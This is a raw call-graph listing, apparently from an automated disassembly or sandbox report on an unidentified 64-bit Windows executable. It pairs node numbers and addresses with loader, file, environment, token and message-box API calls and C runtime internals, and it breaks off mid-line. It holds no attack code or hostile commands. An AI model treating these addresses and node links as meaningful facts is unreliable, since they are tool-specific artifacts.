__vcrt_InitializeCriticalSectionEx 15924->15931 15926 7ff72b05d05a LoadLibraryExW 15928 7ff72b05d07b GetLastError 15926->15928 15929 7ff72b05d0f9 15926->15929 15927 7ff72b05d119 GetProcAddress 15927->15925 15928->15931 15929->15927 15930 7ff72b05d110 FreeLibrary 15929->15930 15930->15927 15931->15925 15931->15926 15931->15927 15932 7ff72b05d09d LoadLibraryExW 15931->15932 15932->15929 15932->15931 15934 7ff72b05c5ab GetStartupInfoW 15933->15934 15934->15767 15938 7ff72b06e790 15935->15938 15936 7ff72b06e7e3 16239 7ff72b069b24 15936->16239 15938->15936 15939 7ff72b06e836 15938->15939 16249 7ff72b06e668 15939->16249 15941 7ff72b06e80c 15941->15788 16356 7ff72b05bb70 15942->16356 15945 7ff72b05341b 16363 7ff72b0529e0 15945->16363 15946 7ff72b053438 16358 7ff72b0585a0 FindFirstFileExW 15946->16358 15950 7ff72b05344b 16373 7ff72b058620 CreateFileW 15950->16373 15951 7ff72b0534a5 16382 7ff72b058760 15951->16382 15953 7ff72b05b870 _log10_special 8 API calls 15956 7ff72b0534dd 15953->15956 15956->15879 15964 7ff72b0518f0 15956->15964 15957 7ff72b0534b3 15960 7ff72b0526c0 49 API calls 15957->15960 15963 7ff72b05342e 15957->15963 15958 7ff72b05345c 16376 7ff72b0526c0 15958->16376 15960->15963 15962 7ff72b053474 __vcrt_InitializeCriticalSectionEx 15962->15951 15963->15953 15965 7ff72b053f70 108 API calls 15964->15965 15966 7ff72b051925 15965->15966 15967 7ff72b051bb6 15966->15967 15969 7ff72b0576a0 83 API calls 15966->15969 15968 7ff72b05b870 _log10_special 8 API calls 15967->15968 15970 7ff72b051bd1 15968->15970 15971 7ff72b05196b 15969->15971 15970->15794 15970->15795 16003 7ff72b05199c 15971->16003 16787 7ff72b05f9f4 15971->16787 15972 7ff72b05f36c 74 API calls 15972->15967 15974 7ff72b051985 15975 7ff72b051989 15974->15975 15976 7ff72b0519a1 15974->15976 16794 7ff72b052760 15975->16794 16791 7ff72b05f6bc 15976->16791 15980 7ff72b0519d7 15983 7ff72b0519ee 15980->15983 15984 7ff72b051a06 15980->15984 15981 7ff72b0519bf 15982 7ff72b052760 53 API calls 15981->15982 15982->16003 15985 7ff72b052760 53 API calls 15983->15985 15986 7ff72b051bf0 49 API calls 15984->15986 15985->16003 15987 7ff72b051a1d 15986->15987 15988 7ff72b051bf0 49 API calls 15987->15988 15989 7ff72b051a68 15988->15989 15990 7ff72b05f9f4 73 API calls 15989->15990 15991 7ff72b051a8c 15990->15991 15992 7ff72b051ab9 15991->15992 15993 7ff72b051aa1 15991->15993 15995 7ff72b05f6bc _fread_nolock 53 API calls 15992->15995 15994 7ff72b052760 53 API calls 15993->15994 15994->16003 15996 7ff72b051ace 15995->15996 15997 7ff72b051aec 15996->15997 15998 7ff72b051ad4 15996->15998 16811 7ff72b05f430 15997->16811 16000 7ff72b052760 53 API calls 15998->16000 16000->16003 16002 7ff72b0525f0 53 API calls 16002->16003 16003->15972 16005 7ff72b057e1a 16004->16005 16006 7ff72b0586b0 2 API calls 16005->16006 16007 7ff72b057e39 GetEnvironmentVariableW 16006->16007 16008 7ff72b057e56 ExpandEnvironmentStringsW 16007->16008 16009 7ff72b057ea2 16007->16009 16008->16009 16010 7ff72b057e78 16008->16010 16011 7ff72b05b870 _log10_special 8 API calls 16009->16011 16012 7ff72b058760 2 API calls 16010->16012 16013 7ff72b057eb4 16011->16013 16014 7ff72b057e8a 16012->16014 16013->15805 16015 7ff72b05b870 _log10_special 8 API calls 16014->16015 16016 7ff72b057e9a 16015->16016 16016->15805 16018 7ff72b0586b0 2 API calls 16017->16018 16019 7ff72b057f94 16018->16019 17020 7ff72b067548 16019->17020 16021 7ff72b057fa6 __vcrt_freefls 16021->15820 16023 7ff72b051c15 16022->16023 16024 7ff72b063ca4 49 API calls 16023->16024 16025 7ff72b051c38 16024->16025 16025->15836 16025->15837 16027 7ff72b058415 16026->16027 17038 7ff72b057b50 GetCurrentProcess OpenProcessToken 16027->17038 16030 7ff72b057b50 7 API calls 16031 7ff72b058441 16030->16031 16032 7ff72b05845a 16031->16032 16033 7ff72b058474 16031->16033 16034 7ff72b052590 48 API calls 16032->16034 16035 7ff72b052590 48 API calls 16033->16035 16036 7ff72b058472 16034->16036 16037 7ff72b058487 LocalFree LocalFree 16035->16037 16036->16037 16038 7ff72b0584a3 16037->16038 16040 7ff72b0584af 16037->16040 17048 7ff72b052940 16038->17048 16041 7ff72b05b870 _log10_special 8 API calls 16040->16041 16078 7ff72b0586d2 MultiByteToWideChar 16077->16078 16079 7ff72b0586f6 16077->16079 16078->16079 16081 7ff72b05870c __vcrt_freefls 16078->16081 16080 7ff72b058713 MultiByteToWideChar 16079->16080 16079->16081 16080->16081 16081->15833 16083 7ff72b056575 16082->16083 16084 7ff72b0538d5 16083->16084 16085 7ff72b052760 53 API calls 16083->16085 16086 7ff72b056b00 16084->16086 16085->16084 16087 7ff72b056b30 16086->16087 16090 7ff72b056b4a __vcrt_freefls 16086->16090 16087->16090 17332 7ff72b051440 16087->17332 16089 7ff72b056b54 16089->16090 16091 7ff72b053fe0 49 API calls 16089->16091 16090->15847 16092 7ff72b056b76 16091->16092 16093 7ff72b053fe0 49 API calls 16092->16093 16095 7ff72b056b7b 16092->16095 16096 7ff72b056b9a 16093->16096 16094 7ff72b052870 53 API calls 16094->16090 16095->16094 16096->16095 16097 7ff72b053fe0 49 API calls 16096->16097 16098 7ff72b056bb6 16097->16098 16098->16095 16099 7ff72b056bbf 16098->16099 16100 7ff72b0525f0 53 API calls 16099->16100 16101 7ff72b056c2f memcpy_s __vcrt_freefls 16099->16101 16100->16090 16101->15847 16114 7ff72b0530ee __scrt_get_show_window_mode 16102->16114 16103 7ff72b05b870 _log10_special 8 API calls 16104 7ff72b05338e 16103->16104 16104->15879 16121 7ff72b0583e0 LocalFree 16104->16121 16105 7ff72b0532e7 16105->16103 16107 7ff72b051bf0 49 API calls 16107->16114 16108 7ff72b053309 16110 7ff72b0525f0 53 API calls 16108->16110 16110->16105 16113 7ff72b0532e9 16116 7ff72b0525f0 53 API calls 16113->16116 16114->16105 16114->16107 16114->16108 16114->16113 16115 7ff72b052870 53 API calls 16114->16115 16119 7ff72b0532f7 16114->16119 17399 7ff72b053f10 16114->17399 17405 7ff72b057530 16114->17405 17417 7ff72b0515c0 16114->17417 17455 7ff72b0568e0 16114->17455 17459 7ff72b053b40 16114->17459 17503 7ff72b053e00 16114->17503 16115->16114 16116->16105 16120 7ff72b0525f0 53 API calls 16119->16120 16120->16105 16123 7ff72b05262a 16122->16123 16124 7ff72b063ca4 49 API calls 16123->16124 16125 7ff72b052652 16124->16125 16126 7ff72b0586b0 2 API calls 16125->16126 16127 7ff72b05266a 16126->16127 16128 7ff72b05268e MessageBoxA 16127->16128 16129 7ff72b052677 MessageBoxW 16127->16129 16130 7ff72b0526a0 16128->16130 16129->16130 16134 7ff72b05b879 16133->16134 16135 7ff72b05372a 16134->16135 16136 7ff72b05bc00 IsProcessorFeaturePresent 16134->16136 16135->15893 16137 7ff72b05bc18 16136->16137 17639 7ff72b05bdf8 RtlCaptureContext 16137->17639 16143 7ff72b053f7c 16142->16143 16144 7ff72b0586b0 2 API calls 16143->16144 16145 7ff72b053fa4 16144->16145 16146 7ff72b0586b0 2 API calls 16145->16146 16147 7ff72b053fb7 16146->16147 17644 7ff72b0652a4 16147->17644 16150 7ff72b05b870 _log10_special 8 API calls 16151 7ff72b053746 16150->16151 16151->15800 16152 7ff72b0576a0 16151->16152 16153 7ff72b0576c4 16152->16153 16154 7ff72b05f9f4 73 API calls 16153->16154 16159 7ff72b05779b __vcrt_freefls 16153->16159 16155 7ff72b0576e0 16154->16155 16155->16159 18035 7ff72b066bd8 16155->18035 16157 7ff72b05f9f4 73 API calls 16160 7ff72b0576f5 16157->16160 16158 7ff72b05f6bc _fread_nolock 53 API calls 16158->16160 16159->15804 16160->16157 16160->16158 16160->16159 16162 7ff72b05f39c 16161->16162 18050 7ff72b05f148 16162->18050 16164 7ff72b05f3b5 16164->15800 16166 7ff72b051bf0 49 API calls 16165->16166 16167 7ff72b053ead 16166->16167 16167->15815 16169 7ff72b051bf0 49 API calls 16168->16169 16170 7ff72b054010 16169->16170 16170->15837 16172 7ff72b0565bc 16171->16172 16175 7ff72b0517e0 45 API calls 16172->16175 16176 7ff72b05675d 16172->16176 16177 7ff72b051bf0 49 API calls 16172->16177 16179 7ff72b0566df 16172->16179 16180 7ff72b05674a 16172->16180 16182 7ff72b053f10 10 API calls 16172->16182 16183 7ff72b05670d 16172->16183 16184 7ff72b057530 52 API calls 16172->16184 16186 7ff72b052870 53 API calls 16172->16186 16187 7ff72b056737 16172->16187 16188 7ff72b0515c0 118 API calls 16172->16188 16190 7ff72b056720 16172->16190 16173 7ff72b05b870 _log10_special 8 API calls 16174 7ff72b0566f1 16173->16174 16174->15851 16175->16172 16178 7ff72b0525f0 53 API calls 16176->16178 16177->16172 16178->16179 16179->16173 16181 7ff72b0525f0 53 API calls 16180->16181 16181->16179 16182->16172 16185 7ff72b0525f0 53 API calls 16183->16185 16184->16172 16185->16179 16186->16172 16189 7ff72b0525f0 53 API calls 16187->16189 16188->16172 16189->16179 16191 7ff72b0525f0 53 API calls 16190->16191 16191->16179 18061 7ff72b0581a0 16192->18061 16194 7ff72b056989 16195 7ff72b0581a0 3 API calls 16194->16195 16196 7ff72b05699c 16195->16196 16197 7ff72b0569cf 16196->16197 16199 7ff72b0569b4 16196->16199 16198 7ff72b0525f0 53 API calls 16197->16198 16200 7ff72b053916 16198->16200 18065 7ff72b056ea0 GetProcAddress 16199->18065 16200->15864 16202 7ff72b056cd0 16200->16202 16203 7ff72b056ced 16202->16203 16209 7ff72b0528aa 16208->16209 16210 7ff72b063ca4 49 API calls 16209->16210 16211 7ff72b0528d2 16210->16211 16212 7ff72b0586b0 2 API calls 16211->16212 16213 7ff72b0528ea 16212->16213 16214 7ff72b05290e MessageBoxA 16213->16214 16215 7ff72b0528f7 MessageBoxW 16213->16215 16216 7ff72b052920 16214->16216 16215->16216 16217 7ff72b05b870 _log10_special 8 API calls 16216->16217 16218 7ff72b052930 16217->16218 16219 7ff72b056780 16218->16219 16220 7ff72b0568d6 16219->16220 16225 7ff72b056792 16219->16225 16220->15848 18130 7ff72b055af0 16226->18130 16234 7ff72b0530b9 16235 7ff72b0533a0 16234->16235 16236 7ff72b0533ae 16235->16236 16238 7ff72b0533bf 16236->16238 18418 7ff72b058180 FreeLibrary 16236->18418 16238->15858 16256 7ff72b06986c 16239->16256 16242 7ff72b069b5f 16242->15941 16355 7ff72b06477c EnterCriticalSection 16249->16355 16257 7ff72b069888 GetLastError 16256->16257 16258 7ff72b0698c3 16256->16258 16259 7ff72b069898 16257->16259 16258->16242 16262 7ff72b0698d8 16258->16262 16269 7ff72b06a6a0 16259->16269 16263 7ff72b06990c 16262->16263 16264 7ff72b0698f4 GetLastError SetLastError 16262->16264 16263->16242 16265 7ff72b069c10 IsProcessorFeaturePresent 16263->16265 16264->16263 16266 7ff72b069c23 16265->16266 16347 7ff72b069924 16266->16347 16270 7ff72b06a6da FlsSetValue 16269->16270 16271 7ff72b06a6bf FlsGetValue 16269->16271 16273 7ff72b06a6e7 16270->16273 16274 7ff72b0698b3 SetLastError 16270->16274 16272 7ff72b06a6d4 16271->16272 16271->16274 16272->16270 16286 7ff72b06dea8 16273->16286 16274->16258 16277 7ff72b06a714 FlsSetValue 16279 7ff72b06a732 16277->16279 16280 7ff72b06a720 FlsSetValue 16277->16280 16278 7ff72b06a704 FlsSetValue 16281 7ff72b06a70d 16278->16281 16299 7ff72b06a204 16279->16299 16280->16281 16293 7ff72b069c58 16281->16293 16291 7ff72b06deb9 _get_daylight 16286->16291 16287 7ff72b06deee RtlAllocateHeap 16289 7ff72b06a6f6 16287->16289 16287->16291 16288 7ff72b06df0a 16307 7ff72b0643f4 16288->16307 16289->16277 16289->16278 16291->16287 16291->16288 16304 7ff72b0728a0 16291->16304 16294 7ff72b069c5d RtlDeleteBoundaryDescriptor 16293->16294 16295 7ff72b069c8c 16293->16295 16294->16295 16296 7ff72b069c78 GetLastError 16294->16296 16295->16274 16297 7ff72b069c85 Concurrency::details::SchedulerProxy::DeleteThis 16296->16297 16298 7ff72b0643f4 _get_daylight 9 API calls 16297->16298 16298->16295 16333 7ff72b06a0dc 16299->16333 16310 7ff72b0728e0 16304->16310 16316 7ff72b06a5d8 GetLastError 16307->16316 16309 7ff72b0643fd 16309->16289 16315 7ff72b06f5e8 EnterCriticalSection 16310->16315 16317 7ff72b06a5fc 16316->16317 16318 7ff72b06a619 FlsSetValue 16316->16318 16317->16318 16331 7ff72b06a609 16317->16331 16319 7ff72b06a62b 16318->16319 16318->16331 16321 7ff72b06dea8 _get_daylight 5 API calls 16319->16321 16320 7ff72b06a685 SetLastError 16320->16309 16322 7ff72b06a63a 16321->16322 16323 7ff72b06a658 FlsSetValue 16322->16323 16324 7ff72b06a648 FlsSetValue 16322->16324 16325 7ff72b06a676 16323->16325 16326 7ff72b06a664 FlsSetValue 16323->16326 16327 7ff72b06a651 16324->16327 16328 7ff72b06a204 _get_daylight 5 API calls 16325->16328 16326->16327 16329 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16327->16329 16330 7ff72b06a67e 16328->16330 16329->16331 16332 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16330->16332 16331->16320 16332->16320 16345 7ff72b06f5e8 EnterCriticalSection 16333->16345 16348 7ff72b06995e _isindst __scrt_get_show_window_mode 16347->16348 16349 7ff72b069986 RtlCaptureContext RtlLookupFunctionEntry 16348->16349 16350 7ff72b0699f6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16349->16350 16351 7ff72b0699c0 RtlVirtualUnwind 16349->16351 16352 7ff72b069a48 _isindst 16350->16352 16351->16350 16353 7ff72b05b870 _log10_special 8 API calls 16352->16353 16354 7ff72b069a67 GetCurrentProcess TerminateProcess 16353->16354 16357 7ff72b0533ec GetModuleFileNameW 16356->16357 16357->15945 16357->15946 16359 7ff72b0585df FindClose 16358->16359 16360 7ff72b0585f2 16358->16360 16359->16360 16361 7ff72b05b870 _log10_special 8 API calls 16360->16361 16362 7ff72b053442 16361->16362 16362->15950 16362->15951 16364 7ff72b05bb70 16363->16364 16365 7ff72b0529fc GetLastError 16364->16365 16366 7ff72b052a29 16365->16366 16387 7ff72b063ef8 16366->16387 16371 7ff72b05b870 _log10_special 8 API calls 16372 7ff72b052ae5 16371->16372 16372->15963 16374 7ff72b053458 16373->16374 16375 7ff72b058660 GetFinalPathNameByHandleW CloseHandle 16373->16375 16374->15958 16374->15962 16375->16374 16377 7ff72b0526fa 16376->16377 16378 7ff72b063ef8 48 API calls 16377->16378 16379 7ff72b052722 MessageBoxW 16378->16379 16380 7ff72b05b870 _log10_special 8 API calls 16379->16380 16381 7ff72b05274c 16380->16381 16381->15963 16383 7ff72b05878a WideCharToMultiByte 16382->16383 16384 7ff72b0587b5 16382->16384 16383->16384 16386 7ff72b0587cb __vcrt_freefls 16383->16386 16385 7ff72b0587d2 WideCharToMultiByte 16384->16385 16384->16386 16385->16386 16386->15957 16390 7ff72b063f52 16387->16390 16388 7ff72b063f77 16389 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16388->16389 16393 7ff72b063fa1 16389->16393 16390->16388 16391 7ff72b063fb3 16390->16391 16409 7ff72b0622b0 16391->16409 16395 7ff72b05b870 _log10_special 8 API calls 16393->16395 16397 7ff72b052a54 FormatMessageW 16395->16397 16396 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16396->16393 16405 7ff72b052590 16397->16405 16398 7ff72b064094 16398->16396 16399 7ff72b064060 16399->16398 16400 7ff72b064069 16399->16400 16402 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16400->16402 16401 7ff72b0640ba 16401->16398 16403 7ff72b0640c4 16401->16403 16402->16393 16404 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16403->16404 16404->16393 16406 7ff72b0525b5 16405->16406 16407 7ff72b063ef8 48 API calls 16406->16407 16408 7ff72b0525d8 MessageBoxW 16407->16408 16408->16371 16410 7ff72b0622ee 16409->16410 16411 7ff72b0622de 16409->16411 16412 7ff72b0622f7 16410->16412 16418 7ff72b062325 16410->16418 16413 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16411->16413 16414 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16412->16414 16415 7ff72b06231d 16413->16415 16414->16415 16415->16398 16415->16399 16415->16400 16415->16401 16418->16411 16418->16415 16420 7ff72b062cc4 16418->16420 16453 7ff72b062710 16418->16453 16490 7ff72b061ea0 16418->16490 16421 7ff72b062d77 16420->16421 16422 7ff72b062d06 16420->16422 16425 7ff72b062d7c 16421->16425 16426 7ff72b062dd0 16421->16426 16423 7ff72b062d0c 16422->16423 16424 7ff72b062da1 16422->16424 16427 7ff72b062d40 16423->16427 16428 7ff72b062d11 16423->16428 16513 7ff72b061074 16424->16513 16429 7ff72b062d7e 16425->16429 16430 7ff72b062db1 16425->16430 16431 7ff72b062de7 16426->16431 16432 7ff72b062dda 16426->16432 16436 7ff72b062ddf 16426->16436 16427->16436 16437 7ff72b062d17 16427->16437 16428->16431 16428->16437 16439 7ff72b062d8d 16429->16439 16442 7ff72b062d20 16429->16442 16520 7ff72b060c64 16430->16520 16527 7ff72b0639cc 16431->16527 16432->16424 16432->16436 16451 7ff72b062e10 16436->16451 16531 7ff72b061484 16436->16531 16440 7ff72b062d52 16437->16440 16437->16442 16450 7ff72b062d3b 16437->16450 16439->16424 16443 7ff72b062d92 16439->16443 16440->16451 16503 7ff72b0637b4 16440->16503 16442->16451 16493 7ff72b063478 16442->16493 16443->16451 16509 7ff72b063878 16443->16509 16445 7ff72b05b870 _log10_special 8 API calls 16447 7ff72b06310a 16445->16447 16447->16418 16450->16451 16452 7ff72b062ffc 16450->16452 16538 7ff72b063ae0 16450->16538 16451->16445 16452->16451 16544 7ff72b06dd18 16452->16544 16454 7ff72b06271e 16453->16454 16455 7ff72b062734 16453->16455 16457 7ff72b062d77 16454->16457 16458 7ff72b062d06 16454->16458 16459 7ff72b062774 16454->16459 16456 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16455->16456 16455->16459 16456->16459 16462 7ff72b062d7c 16457->16462 16463 7ff72b062dd0 16457->16463 16460 7ff72b062d0c 16458->16460 16461 7ff72b062da1 16458->16461 16459->16418 16465 7ff72b062d40 16460->16465 16466 7ff72b062d11 16460->16466 16471 7ff72b061074 38 API calls 16461->16471 16467 7ff72b062d7e 16462->16467 16468 7ff72b062db1 16462->16468 16464 7ff72b062ddf 16463->16464 16469 7ff72b062de7 16463->16469 16470 7ff72b062dda 16463->16470 16479 7ff72b061484 38 API calls 16464->16479 16488 7ff72b062e10 16464->16488 16465->16464 16472 7ff72b062d17 16465->16472 16466->16469 16466->16472 16476 7ff72b062d8d 16467->16476 16478 7ff72b062d20 16467->16478 16473 7ff72b060c64 38 API calls 16468->16473 16475 7ff72b0639cc 45 API calls 16469->16475 16470->16461 16470->16464 16485 7ff72b062d3b 16471->16485 16477 7ff72b062d52 16472->16477 16472->16478 16472->16485 16473->16485 16474 7ff72b063478 47 API calls 16474->16485 16475->16485 16476->16461 16480 7ff72b062d92 16476->16480 16481 7ff72b0637b4 46 API calls 16477->16481 16477->16488 16478->16474 16478->16488 16479->16485 16483 7ff72b063878 37 API calls 16480->16483 16480->16488 16481->16485 16482 7ff72b05b870 _log10_special 8 API calls 16484 7ff72b06310a 16482->16484 16483->16485 16484->16418 16486 7ff72b063ae0 45 API calls 16485->16486 16485->16488 16489 7ff72b062ffc 16485->16489 16486->16489 16487 7ff72b06dd18 46 API calls 16487->16489 16488->16482 16489->16487 16489->16488 16770 7ff72b0602e8 16490->16770 16494 7ff72b06349e 16493->16494 16556 7ff72b05fea0 16494->16556 16499 7ff72b063ae0 45 API calls 16502 7ff72b0635e3 16499->16502 16500 7ff72b063ae0 45 API calls 16501 7ff72b063671 16500->16501 16501->16450 16502->16500 16502->16501 16502->16502 16504 7ff72b0637e9 16503->16504 16505 7ff72b063807 16504->16505 16506 7ff72b06382e 16504->16506 16507 7ff72b063ae0 45 API calls 16504->16507 16508 7ff72b06dd18 46 API calls 16505->16508 16506->16450 16507->16505 16508->16506 16512 7ff72b063899 16509->16512 16510 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16511 7ff72b0638ca 16510->16511 16511->16450 16512->16510 16512->16511 16514 7ff72b0610a7 16513->16514 16515 7ff72b0610d6 16514->16515 16517 7ff72b061193 16514->16517 16519 7ff72b061113 16515->16519 16702 7ff72b05ff48 16515->16702 16518 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16517->16518 16518->16519 16519->16450 16522 7ff72b060c97 16520->16522 16521 7ff72b060cc6 16523 7ff72b05ff48 12 API calls 16521->16523 16526 7ff72b060d03 16521->16526 16522->16521 16524 7ff72b060d83 16522->16524 16523->16526 16525 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16524->16525 16525->16526 16526->16450 16528 7ff72b063a0f 16527->16528 16530 7ff72b063a13 __crtLCMapStringW 16528->16530 16710 7ff72b063a68 16528->16710 16530->16450 16533 7ff72b0614b7 16531->16533 16532 7ff72b0614e6 16534 7ff72b05ff48 12 API calls 16532->16534 16537 7ff72b061523 16532->16537 16533->16532 16535 7ff72b0615a3 16533->16535 16534->16537 16536 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16535->16536 16536->16537 16537->16450 16539 7ff72b063af7 16538->16539 16714 7ff72b06ccc8 16539->16714 16546 7ff72b06dd49 16544->16546 16554 7ff72b06dd57 16544->16554 16545 7ff72b06dd77 16548 7ff72b06dd88 16545->16548 16549 7ff72b06ddaf 16545->16549 16546->16545 16547 7ff72b063ae0 45 API calls 16546->16547 16546->16554 16547->16545 16760 7ff72b06f3b0 16548->16760 16551 7ff72b06ddd9 16549->16551 16552 7ff72b06de3a 16549->16552 16549->16554 16551->16554 16763 7ff72b06ebb0 16551->16763 16553 7ff72b06ebb0 _fread_nolock MultiByteToWideChar 16552->16553 16553->16554 16554->16452 16557 7ff72b05fed7 16556->16557 16563 7ff72b05fec6 16556->16563 16557->16563 16586 7ff72b06c90c 16557->16586 16560 7ff72b05ff18 16561 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16560->16561 16561->16563 16562 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16562->16560 16564 7ff72b06d880 16563->16564 16565 7ff72b06d89d 16564->16565 16566 7ff72b06d8d0 16564->16566 16567 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16565->16567 16566->16565 16568 7ff72b06d902 16566->16568 16579 7ff72b0635c1 16567->16579 16569 7ff72b06d94a 16568->16569 16574 7ff72b06da15 16568->16574 16569->16579 16593 7ff72b0697b4 16569->16593 16570 7ff72b06db07 16626 7ff72b06cd6c 16570->16626 16571 7ff72b06dacd 16619 7ff72b06d104 16571->16619 16573 7ff72b06da9c 16612 7ff72b06d3e4 16573->16612 16574->16570 16574->16571 16574->16573 16576 7ff72b06da5f 16574->16576 16578 7ff72b06da55 16574->16578 16602 7ff72b06d614 16576->16602 16578->16571 16581 7ff72b06da5a 16578->16581 16579->16499 16579->16502 16581->16573 16581->16576 16584 7ff72b069c10 _isindst 17 API calls 16585 7ff72b06db64 16584->16585 16587 7ff72b06c957 16586->16587 16591 7ff72b06c91b _get_daylight 16586->16591 16588 7ff72b0643f4 _get_daylight 11 API calls 16587->16588 16590 7ff72b05ff04 16588->16590 16589 7ff72b06c93e RtlAllocateHeap 16589->16590 16589->16591 16590->16560 16590->16562 16591->16587 16591->16589 16592 7ff72b0728a0 _get_daylight 2 API calls 16591->16592 16592->16591 16594 7ff72b0697cb 16593->16594 16595 7ff72b0697c1 16593->16595 16596 7ff72b0643f4 _get_daylight 11 API calls 16594->16596 16595->16594 16600 7ff72b0697e6 16595->16600 16597 7ff72b0697d2 16596->16597 16635 7ff72b069bf0 16597->16635 16599 7ff72b0697de 16599->16579 16599->16584 16600->16599 16601 7ff72b0643f4 _get_daylight 11 API calls 16600->16601 16601->16597 16638 7ff72b0733bc 16602->16638 16606 7ff72b06d6c0 16606->16579 16607 7ff72b06d6bc 16607->16606 16608 7ff72b06d711 16607->16608 16610 7ff72b06d6dc 16607->16610 16691 7ff72b06d200 16608->16691 16687 7ff72b06d4bc 16610->16687 16613 7ff72b0733bc 38 API calls 16612->16613 16614 7ff72b06d42e 16613->16614 16615 7ff72b072e04 37 API calls 16614->16615 16616 7ff72b06d47e 16615->16616 16617 7ff72b06d482 16616->16617 16618 7ff72b06d4bc 45 API calls 16616->16618 16617->16579 16618->16617 16620 7ff72b0733bc 38 API calls 16619->16620 16621 7ff72b06d14f 16620->16621 16622 7ff72b072e04 37 API calls 16621->16622 16623 7ff72b06d1a7 16622->16623 16624 7ff72b06d1ab 16623->16624 16625 7ff72b06d200 45 API calls 16623->16625 16624->16579 16625->16624 16627 7ff72b06cde4 16626->16627 16628 7ff72b06cdb1 16626->16628 16629 7ff72b06ce7d 16627->16629 16630 7ff72b06cdfc 16627->16630 16631 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16628->16631 16633 7ff72b06cddd __scrt_get_show_window_mode 16629->16633 16634 7ff72b063ae0 45 API calls 16629->16634 16632 7ff72b06d104 46 API calls 16630->16632 16631->16633 16632->16633 16633->16579 16634->16633 16636 7ff72b069a88 _invalid_parameter_noinfo 37 API calls 16635->16636 16637 7ff72b069c09 16636->16637 16637->16599 16639 7ff72b07340f fegetenv 16638->16639 16640 7ff72b07713c 37 API calls 16639->16640 16643 7ff72b073462 16640->16643 16641 7ff72b07348f 16646 7ff72b0697b4 __std_exception_copy 37 API calls 16641->16646 16642 7ff72b073552 16644 7ff72b07713c 37 API calls 16642->16644 16643->16642 16647 7ff72b07352c 16643->16647 16648 7ff72b07347d 16643->16648 16645 7ff72b07357c 16644->16645 16649 7ff72b07713c 37 API calls 16645->16649 16650 7ff72b07350d 16646->16650 16651 7ff72b0697b4 __std_exception_copy 37 API calls 16647->16651 16648->16641 16648->16642 16652 7ff72b07358d 16649->16652 16653 7ff72b074634 16650->16653 16657 7ff72b073515 16650->16657 16651->16650 16655 7ff72b077330 20 API calls 16652->16655 16654 7ff72b069c10 _isindst 17 API calls 16653->16654 16656 7ff72b074649 16654->16656 16661 7ff72b0735f6 __scrt_get_show_window_mode 16655->16661 16658 7ff72b05b870 _log10_special 8 API calls 16657->16658 16659 7ff72b06d661 16658->16659 16683 7ff72b072e04 16659->16683 16660 7ff72b07399f __scrt_get_show_window_mode 16661->16660 16662 7ff72b073637 memcpy_s 16661->16662 16667 7ff72b0643f4 _get_daylight 11 API calls 16661->16667 16676 7ff72b073a93 memcpy_s __scrt_get_show_window_mode 16662->16676 16679 7ff72b073f7b memcpy_s __scrt_get_show_window_mode 16662->16679 16663 7ff72b072f20 37 API calls 16668 7ff72b0743f7 16663->16668 16664 7ff72b073cdf 16664->16663 16665 7ff72b07464c memcpy_s 37 API calls 16665->16664 16666 7ff72b073c8b 16666->16664 16666->16665 16669 7ff72b073a70 16667->16669 16671 7ff72b07464c memcpy_s 37 API calls 16668->16671 16682 7ff72b074452 16668->16682 16670 7ff72b069bf0 _invalid_parameter_noinfo 37 API calls 16669->16670 16670->16662 16671->16682 16672 7ff72b0745d8 16674 7ff72b07713c 37 API calls 16672->16674 16673 7ff72b0643f4 11 API calls _get_daylight 16673->16676 16674->16657 16675 7ff72b0643f4 11 API calls _get_daylight 16675->16679 16676->16666 16676->16673 16678 7ff72b069bf0 37 API calls _invalid_parameter_noinfo 16676->16678 16677 7ff72b069bf0 37 API calls _invalid_parameter_noinfo 16677->16679 16678->16676 16679->16664 16679->16666 16679->16675 16679->16677 16680 7ff72b072f20 37 API calls 16680->16682 16681 7ff72b07464c memcpy_s 37 API calls 16681->16682 16682->16672 16682->16680 16682->16681 16684 7ff72b072e23 16683->16684 16685 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16684->16685 16686 7ff72b072e4e memcpy_s 16684->16686 16685->16686 16686->16607 16686->16686 16688 7ff72b06d4e8 memcpy_s 16687->16688 16689 7ff72b063ae0 45 API calls 16688->16689 16690 7ff72b06d5a2 memcpy_s __scrt_get_show_window_mode 16688->16690 16689->16690 16690->16606 16692 7ff72b06d23b 16691->16692 16696 7ff72b06d288 memcpy_s 16691->16696 16693 7ff72b069b24 _invalid_parameter_noinfo 37 API calls 16692->16693 16694 7ff72b06d267 16693->16694 16694->16606 16695 7ff72b06d2f3 16697 7ff72b0697b4 __std_exception_copy 37 API calls 16695->16697 16696->16695 16698 7ff72b063ae0 45 API calls 16696->16698 16701 7ff72b06d335 memcpy_s 16697->16701 16698->16695 16699 7ff72b069c10 _isindst 17 API calls 16700 7ff72b06d3e0 16699->16700 16701->16699 16703 7ff72b05ff7f 16702->16703 16709 7ff72b05ff6e 16702->16709 16704 7ff72b06c90c _fread_nolock 12 API calls 16703->16704 16703->16709 16705 7ff72b05ffb0 16704->16705 16706 7ff72b05ffc4 16705->16706 16707 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16705->16707 16708 7ff72b069c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16706->16708 16707->16706 16708->16709 16709->16519 16711 7ff72b063a86 16710->16711 16713 7ff72b063a8e 16710->16713 16712 7ff72b063ae0 45 API calls 16711->16712 16712->16713 16713->16530 16715 7ff72b063b1f 16714->16715 16716 7ff72b06cce1 